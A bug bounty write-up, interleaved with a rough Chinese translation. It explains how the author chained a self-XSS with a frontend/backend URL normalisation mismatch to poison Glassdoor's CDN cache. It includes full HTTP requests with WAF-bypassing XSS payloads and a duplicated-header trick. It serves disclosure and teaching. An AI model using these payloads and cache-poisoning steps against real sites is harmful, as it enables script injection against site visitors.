Caching the Un-cacheables – Abusing URL Parser Confusions (Web Cache Poisoning Technique)

Here is how I was able to poison the cache of thousands of pages in Glassdoor with reflected & stored XSS
以下是我如何能够使用反射和存储的 XSS 毒害 Glassdoor 中数千个页面的缓存

Caching the Un-cacheables - Abusing URL Parser Confusions (Web Cache Poisoning Technique)

Introduction 介绍

Imagine you just picked up a new attractive bug bounty program your friend recommended, and you get excited to try it out because of all the good stories you’ve heard, but after a few days of intensive recon and research, you are left empty handed and end the day with no findings. The next day you start to doubt yourself, so you start looking for P4s and P5s, when all of the sudden, you find a header XSS. Seems pretty lame, until you remembered that your target has a caching server! You try to find a way to cache the XSS to store it, but keep getting stuck on MISS. Looks like they have web cache poisoning protection on this endpoint, making it un-cacheable, so you’re out of luck. Just when you thought you had a P2 or P1, reality HITS you like James Kettle’s web cache poisoning payloads. This seems like a dead end, so what do you do now? Have you maybe tried URL parsing confusions?
想象一下,你刚刚拿起了你朋友推荐的一个新的有吸引力的漏洞赏金计划,你很高兴尝试它,因为你听到了所有好故事,但经过几天的密集侦察和研究,你空手而归,结束了一天没有发现。第二天你开始怀疑自己,所以你开始寻找 P4 和 P5,突然间,你发现了一个标题 XSS。看起来很蹩脚,直到你记得你的目标有一个缓存服务器!您试图找到一种方法来缓存 XSS 以存储它,但一直卡在 MISS 上。看起来他们在此端点上有 Web 缓存中毒保护,使其无法缓存,所以你不走运。就在你以为你有一个 P2 或 P1 的时候,现实会打击你喜欢 James Kettle 的 Web 缓存中毒有效载荷。这似乎是一条死胡同,那你现在该怎么办?您是否尝试过 URL 解析混淆?


  1. For any page under the path all URL parameters are reflected within a Javascript script tag. Lack of sanitization means we can inject </script into the page with</script, however due to the WAF we cannot simply escape the script tags and execute our own
    对于路径下的任何页面 所有 URL 参数都反映在 Javascript 脚本标记中。缺乏清理意味着我们可以使用</script 将 </script 注入页面,但是由于 WAF,我们不能简单地转义脚本标签并执行我们自己的
  2. The optimizelyEndUserId cookie value is reflected in the page, right after the URL parameters. By combining this with the issue from step 1. we can bypass the WAF by splitting the payload into two parts to execute arbitrary javascript. However this is a self XSS, because we cannot force our victim to send custom cookies.
    optimizelyEndUserId cookie 值反映在页面中,紧跟在 URL 参数之后。通过将其与步骤 1 中的问题相结合。我们可以通过将有效负载拆分为两部分来执行任意 javascript 来绕过 WAF。但是,这是一个自我XSS,因为我们不能强迫受害者发送自定义cookie。
  3. We can get past this via cache poisoning. Sadly the pages under were not being cached, but all the pages under were.
    我们可以通过缓存中毒来解决这个问题。遗憾的是, 下的页面没有被缓存,但 下的所有页面都被缓存了。
  4. After some testing I found that path traversal characters /../, also known as dot segments, were being normalized by the caching frontend server but not being normalized by the backend web application (Dissagreement of RFC 3986 5.2.4). This means for the path</script it would be seen as</script by the caching server and cached, but the contents for would be returned by the webserver due to lack of normalization
    经过一些测试,我发现路径遍历字符 /../ (也称为点段)被缓存前端服务器规范化,但后端 Web 应用程序没有规范化(RFC 3986 5.2.4 的分歧)。这意味着对于路径
  5. As a result, by sending the request with our payload to</script (and rest of the payload in the cookie) we can succeed in obtaining our XSS. The webserver would interpret it as a page under and the return the contents with our injected XSS payload, while the caching server would see interpret it as</script causing the response to be cached
    因此,通过将带有有效负载的请求发送到</script(以及 cookie 中的其余有效负载),我们可以成功获得 XSS。Web 服务器会将其解释为 下的页面,并使用注入的 XSS 有效负载返回内容,而缓存服务器会将其解释为</script,从而导致响应被缓存
  6. By then visiting</script our XSS will fire
    到那时,访问</script,我们的 XSS 将触发
  7. Achieving a stored XSS was also possible using, which behaved very similarly to /Job, but the XSS was all in the headers and cookies, so sending a parameter in the URL was not necessary.
    使用 也可以实现存储的 XSS,其行为与 /Job 非常相似,但 XSS 全部位于标头和 cookie 中,因此无需在 URL 中发送参数。
  8. Sending with the XSS in the headers and cookies will result in a stored xss under
    发送带有标头和 cookie 中的 XSS 的 将导致存储的 xss 处于

Stored XSS PoC 存储的 XSS PoC

My XSS methodology 我的 XSS 方法

  • When testing for XSS, it’s important to consider all types of exploitations, and take note of everything that looks interesting.
    在测试 XSS 时,重要的是要考虑所有类型的漏洞利用,并注意所有看起来有趣的内容。
  • Even if something might not be exploitable now, try to see the potential it will have in a chained exploit.
  • Many times, exploit chains are made up of unexploitable links that by themselves are useless, but when chained together can be fatal.
  • In Glassdoor, I found such endpoint in /Job/new-york-ny-compliance-officer-jobs-SRCH_IL.0,11_IC1132348_KO12,42069.htm
    在 Glassdoor 中,我在 /Job/new-york-ny-compliance-officer-jobs-SRCH_IL.0,11_IC1132348_KO12,42069.htm
  • I found that the parameter name (and value too) were reflected in the response unsanitized
  • I was very suprised to see this, as this should have been caught very early on. The Glassdoor program has almost 800 submissions, so I didn’t make the mistake of thinking I was the only one who noticed it
    看到这一点,我感到非常惊讶,因为这应该很早就被发现。Glassdoor 程序有近 800 份提交,所以我没有错误地认为我是唯一注意到它的人
  • The parameter was reflected in a string in a script tag, so to achieve an XSS, I had 2 options
    该参数反映在脚本标签的字符串中,因此要实现 XSS,我有 2 个选项

    1. Escape the string and inject javascript
      转义字符串并注入 javascript
    2. Close the script tag and inject a generic XSS payload
      关闭脚本标记并注入通用 XSS 有效负载
  • For the first option, the strings seemed to have been escaped with a backslash, and unfortunately bypassing this is hard.
  • My second option, however, had much more potential as none of the user input was sanitized, so injecting a closing script tag should do the trick
  • However, the moment I put ?</script> (URL decoded here for readability) my request got immediately swatted down and blocked by the WAF. This was very much expected, however I eat WAFs for breakfast >:)
    但是,当我输入 ?</script> (此处解码 URL 以方便阅读)的那一刻,我的请求立即被 WAF 删除并阻止。这是非常期待的,但是我早餐吃WAFs>:)
  • Before trying to play against the WAF, we have to understand the rules of the game.
  • A common mistake I see people make when trying to bypass WAFs, or just filters in general for the matter, is they copy and paste generic WAF bypass payloads without actually understanding why the WAF is blocking their requests. Spraying and praying WAFs is usually a waste of time from my experience, so it’s best to test them manually, and most importantly understand them
    我看到人们在尝试绕过 WAF 或只是一般的过滤器时犯的一个常见错误是,他们复制并粘贴通用 WAF 绕过有效负载,而实际上不了解 WAF 阻止其请求的原因。根据我的经验,喷洒和祈祷 WAF 通常是浪费时间,因此最好手动测试它们,最重要的是了解它们
  • So my first step when bypassing WAFs is to start out with a blocked payload and remove a character by character until the WAF lets me pass
    因此,绕过 WAF 的第一步是从被阻止的有效负载开始,然后逐个字符删除一个字符,直到 WAF 允许我通过
  • Luckily, it didn’t take us long to achieve an agreement with the WAF. All I had to do was remove the greater than > sign and I got a 200.
    幸运的是,我们很快就与WAF达成了协议。我所要做的就是删除大于 > 符号,然后我得到了 200。
  • So now the question is what else doesn’t it like? It seemed like any character after </script will get the attention of the WAF, like </scriptaaa for example
    所以现在的问题是,它还有什么不喜欢的?似乎之后 </script 的任何角色都会引起 WAF 的注意,例如 </scriptaaa
  • This would have been a big issue if the WAF truely blocked </script*, but luckily the WAF did allow whitespace characters such as %20 (space), which means that eventually, the script tag will close by the next upcoming greater than > sign
    如果 WAF 真的被阻止了 </script* ,这将是一个大问题,但幸运的是,WAF 确实允许空格字符,例如 %20 (空格),这意味着最终,脚本标签将在下一个即将到来的大于 > 符号之前关闭
  • So now, the next step turns to finding a new unsanitized injection point that will allow us to close the script and inject an HTML XSS payload
    所以现在,下一步是寻找一个新的未经清理的注入点,这将允许我们关闭脚本并注入 HTML XSS 有效负载
  • I tried to see if I can break down the payload into pieces with other parameters, however it was blocked too. Seemed like the WAF rule applied to the entire URL, not individual parameters. Luckly, I have bypassed these types of WAFs before
  • My first goto technique was an alphanumeric based HTTP parameter pollution, which I’ve already used in the past to bypass a similar WAF in this very program.
  • An alphanumeric parameter pollution abuses the alphanumeric ordering of the reflected queries, so it is possible to bypass a WAF like this by breaking down your payload backwards into different parameters
  • Unfortunately, it didn’t seem like the case here, but I will release a writeup on how I was able to use this technique to achieve reflected XSS
  • At this point I was losing a bit of hope in this endpoint, so I decided to look for a chain link vulnerability instead of a stand-alone vulnerability. This is when I started to take a look at the cookies
  • This is when I noticed that next to the injection point, there was actually a value that came from the optimizelyEndUserId cookie in my request.
  • All I needed to do was to close the script tag and inject the HTML. Injecting ><svg> into the cookie seemed to do the trick.
  • Now I needed to actually execute javascript. We already got over the hard part, so now when we were able to smuggle in an svg tag past the WAF, so the rest should be easy
  • A pretty generic WAF bypass payload seemed to do the trick: ><svg/onload=a=self['aler'%2B't']%3Ba(document.domain)>
  • And now we got an XSS that looks like this:
GET /Job/new-york-ny-compliance-officer-jobs-SRCH_IL.0,11_IC1132348_KO12,42069.htm?attack=VULN%3C/script%20 HTTP/2
Cookie: optimizelyEndUserId=BRUH><svg/onload=a=self['aler'%2B't']%3Ba(document.domain)>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 0
  • However it is a self XSS that only exists if we have control over the cookies
  • This could escalated to reflected XSS with cache poisoning however, so thats what I started to look for next (I know I said stored XSS in the description, I promise we will get there soon!)
    但是,这可能会升级为带有缓存中毒的反射 XSS,所以这就是我接下来开始寻找的内容(我知道我在描述中说过存储的 XSS,我保证我们很快就会到达那里!

The caching methodology for finding relaxed rules

  • When doing my initial recon, I always like testing the cache to see how it behaves.
  • If I see a path that gets cached, I always try to test it’s limit. Many websites have unique rules to how they cache specific paths and files, so manually testing for these rules is a great way to get familiar with the cache server
  • When I first go about manually testing for these caching rules, I usually try to mess with the extensions first. I will remove, add, or change the extension and always carefully observe the caching headers and content of the response
  • After I mess around with the extension, I will test the path itself
  • For example, in Glassdoor I noticed that,11_IC1132348_KO12,42069.htm was getting cached
    例如,在 Glassdoor 中,我注意到它被,11_IC1132348_KO12,42069.htm 缓存了
  • I intercepted the request and sent it to the Burp repeater for further inspection
  • When I changed the extension, I noticed that while I get a 404 page, I still got MISS/HIT cache headers.
    当我更改扩展名时,我注意到虽然我得到了一个 404 页面,但我仍然得到了 MISS/HIT 缓存标头。
  • This immediately got me thinking that there is some sort of pattern for cache or no cache, instead of hardcoded files that get cached
  • Then I moved onto the path. I tried, and noticed it gave me the same 404 page with the same cache headers.
    然后我走上了这条路。我尝试 过,并注意到它给了我相同的 404 页面和相同的缓存标头。
  • I was pretty confident by then I figured out what the rule was, but tested just in case, which gave me a 404 but didn’t cache
    那时我非常有信心弄清楚规则是什么,但为了以防万一 进行了测试,这给了我一个 404 但没有缓存
  • So now it was same to assume that the rule was /Award/*, meaning everything under the /Award path was getting cached
    所以现在假设规则是 /Award/* 相同的,这意味着 /Award 路径下的所有内容都被缓存了
  • For a while, I desperately tried to find some sort of header XSS to get Web Cache Poisoning, but unfortunately I ended up empty handed. However, this finding was still pretty great for me. While by itself it is not a vulnerability, it was a very relaxed rule and had a lot of potential to be chained with a vulnerability
    有一段时间,我拼命地试图找到某种标题 XSS 来获取 Web 缓存中毒,但不幸的是我最终空手而归。然而,这个发现对我来说仍然很棒。虽然它本身不是一个漏洞,但它是一个非常宽松的规则,并且有很大的潜力与漏洞联系在一起

Chaining the exploit 链接漏洞

  • Web Cache Poisoning can be used for many things. The first ones that come to mind are 1) Stored XSS 2) Escalation of unexploitable XSS to Reflected XSS 3) DoS
    网络缓存中毒可以用于很多事情。首先想到的是 1) 存储的 XSS 2) 将不可利用的 XSS 升级为反射的 XSS 3) DoS
  • At the time of my cache rule finding, I was already aware of the unexploitable XSS in /Job/new-york-ny-compliance-officer-jobs-SRCH_IL.0,11_IC1132348_KO12,42069.htm?VULN%3C/script%20, so trying to chain the two bugs into a reflected XSS vulnerability felt like the natrual thing to do
    在我找到缓存规则时,我已经意识到 中 /Job/new-york-ny-compliance-officer-jobs-SRCH_IL.0,11_IC1132348_KO12,42069.htm?VULN%3C/script%20 不可利用的 XSS,因此尝试将这两个错误链接到反射的 XSS 漏洞中感觉像是一件自然而然的事情
  • I went back to the Job path to do a bit more research. I wanted to see if there were any other endpoints that were vulnerable to the self XSS, and there were.
    我回到了工作路径,做了更多的研究。我想看看是否有任何其他端点容易受到 self XSS 的攻击,并且确实存在。
  • I found that every page under the Job path was vulnerable to self XSS, which was great! I took it a step further, and noticed that even pages that were supposed to be 404s, actually returned 200 and were too vulnerable to the self XSS.
    我发现 Job 路径下的每个页面都容易受到 self XSS 的攻击,这太棒了!我更进一步,注意到即使是应该是 404 的页面,实际上也返回了 200 页,并且太容易受到自我 XSS 的攻击。
  • So to recap the important information:

    1. The CDN has a rule that will cache /Award/*
      CDN 有一个规则,该规则将缓存 /Award/*
    2. There is a self XSS vulnerability on /Job/*
      上 /Job/* 存在一个自我 XSS 漏洞
  • The attack surface of these two bugs were not “static”, but relied on a very relaxed wildcard pattern, which got me thinking: “Will these patterns really accept anything? Will the server prioritize the pattern over special URL syntax, such as a dot segment /../, or will it normalize the URL and then match the pattern?”
    这两个 bug 的攻击面不是“静态的”,而是依赖于一个非常宽松的通配符模式,这让我思考:“这些模式真的会接受任何东西吗?服务器会优先于特殊的 URL 语法(例如点段 /../ ),还是会规范化 URL,然后匹配模式?
  • Or in other words: “Will both the backend server and frontend server’s URL parsers normalize the dot segments?”
    或者换句话说:“后端服务器和前端服务器的 URL 解析器是否会对点段进行规范化?
  • To test this, I tried these two payload with the assumption that the URL parser normalized the dot segments:
    为了测试这一点,我尝试了这两个有效负载,假设 URL 解析器规范化了点段:

    1. /Award/../this_should_not_cache
    2. /Job/../this_should_give_a_404
  • And to my suprise, they yielded conflicting results
  • The Award payload was NOT cached, meaning the frontend server’s URL parser does normalize the dot segment before matching with the cache rule
    奖励有效负载未缓存,这意味着前端服务器的 URL 解析器在与缓存规则匹配之前会规范化点段
  • The Job path, however, returned a 200, which means that the web server did NOT normalize the dot segment.
    但是,作业路径返回 200,这意味着 Web 服务器未规范化点段。
  • So to conclude this short test, we can say that the frontend server and the backend server have a disagreement over how a dot segment should be parsed
  • Knowing this, we can construct the following payload:
GET /Job/../Award/RANDOMPATHTATDOESNOTEXIST?cachebuster=046&attack=VULN%3C/script%20 HTTP/2
Cookie: optimizelyEndUserId=BRUH><svg/onload=a=self['aler'%2B't']%3Ba(document.domain)>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 0
  • Since the webserver will NOT normalize the dot segment, we will get the response with the XSS
    由于 Web 服务器不会规范化点段,因此我们将使用 XSS 获得响应
  • But, because the frontend WILL normalize the dot segment, it will be cached (and stored) under /Award/RANDOMPATHTATDOESNOTEXIST?cachebuster=046&attack=VULN%3C/script%20
    但是,由于前端将规范化点段,因此它将被缓存(并存储)在 /Award/RANDOMPATHTATDOESNOTEXIST?cachebuster=046&attack=VULN%3C/script%20
  • So now, when the victim will visit, they will get the stored response with the XSS from the CDN
    所以现在,当受害者访问 时,他们将从 CDN 获得带有 XSS 的存储响应

Stored XSS 存储的 XSS

  • So once I was able to get a working PoC of my reflected XSS, I immediately reported.
    因此,一旦我能够获得反射的 XSS 的工作 PoC,我立即报告。
  • However, I was still not satisfied enough, because I knew that a stored XSS should have been possible under the right conditions
    但是,我仍然不够满意,因为我知道在适当的条件下应该可以存储 XSS
  • so I kept on looking for an XSS that was truely all header based, and behaved similarly to /Job/*, where an XSS was possible under every page under it.
    所以我一直在寻找一个真正完全基于标题的 XSS,并且行为类似于 /Job/* ,在它下面的每个页面下都可以有一个 XSS。
  • Thats when I remembered my first report to glassdoor, a reflected XSS in via an alphanumeric ordered parameter pollution (at the time it was still in triage, so it wasn’t fixed).
    这时我想起了我向 glassdoor 提交的第一份报告,这是通过字母数字有序参数污染在 中反射的 XSS(当时它仍在分类中,因此没有修复)。
  • I thought that maybe I will be able to find a header XSS there too, so I kept on looking
    我想也许我也能在那里找到一个标题 XSS,所以我继续寻找
  • Luckily for me, my reflected XSS from the report was also vulnerable to a full header XSS! But it did not behave like /Job/* where every page under it was vulnerable, so it was pretty much useless
    幸运的是,报告中反映的 XSS 也容易受到完整标题 XSS 的影响!但是它的行为并不像 /Job/* 它下面的每个页面都容易受到攻击,所以它几乎毫无用处
  • I did remember that it was not only one endpoint which was vulnerable, there were quite a few others
  • Luckily, I was eventually able to find an endpoint that was both vulnerable to header XSS AND behaved like /Job/* after testing each of the vulnerable endpoints I previously reported and got to this one:
    幸运的是,我最终能够找到一个既容易受到标头 XSS 攻击的端点,又在测试了我之前报告的每个易受攻击的端点并得到这个端点后表现得很像 /Job/* :
  • The payload looked something like this
GET /mz-survey/interview/collectQuestions_input.htm/../../../Award/RANDOMPATHTATDOESNOTEXIST123?cachebuster=050 HTTP/2
X-Forwarded-For: VULN
X-Forwarded-For: VULN><svg/onload=self[`alert`](document.domain)>
Cookie: gdId=VULN%22</script%20
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  • The reason for splitting the XSS payload into 2 headers and a cookie is to bypass the WAF, as I was not able to put the entire payload into one cookie or header
    将 XSS 有效负载拆分为 2 个标头和一个 cookie 的原因是为了绕过 WAF,因为我无法将整个有效负载放入一个 cookie 或标头中
  • The X-Forwarded-For header is reflected after the cookie, so my opprotunity to continue my payload lied there.
    X-Forwarded-For 标头反映在 cookie 之后,所以我继续有效负载的机会就在那里。
  • Unfortunately, the WAF was even stricter for the X-Forwarded-For header, as I was not able to use ANY special characters whatsoever
    不幸的是,WAF 对 X-Forwarded-For 标头更加严格,因为我无法使用任何特殊字符
  • Interestingly enough, there was another cool header confusion where the WAF only blocked the first X-Forwarded-For header, but the webserver interpreted both and reflected both. This allowed me to easily bypass the WAF by giving a valid value for the first X-Forwarded-For header but the rest of my XSS payload in the second X-Forwarded-For header. This can be seen in the above payload
    有趣的是,还有另一个很酷的标头混淆,WAF 只阻止了第一个 X-Forwarded-For 标头,但 Web 服务器解释了这两个标头并反映了这两个标头。这使我能够轻松地绕过 WAF,为第一个 X-Forwarded-For 标头提供有效值,但在第二个 X-Forwarded-For 标头中提供其余的 XSS 有效负载。这可以从上面的有效载荷中看到

  • Due to the tricky nature of the bug, the triage process was a little more complicated than usual. Big thanks to @bxmbn (AKA bombon on h1)) for giving me some help in the triage process
    由于该错误的棘手性质,分类过程比平时要复杂一些。非常感谢 @bxmbn(又名 bombon on h1))在分类过程中给了我一些帮助

原文始发于Harel Security Research:Caching the Un-cacheables – Abusing URL Parser Confusions (Web Cache Poisoning Technique)

版权声明:admin 发表于 2024年4月2日 下午3:33。
转载请注明:Caching the Un-cacheables – Abusing URL Parser Confusions (Web Cache Poisoning Technique) | CTF导航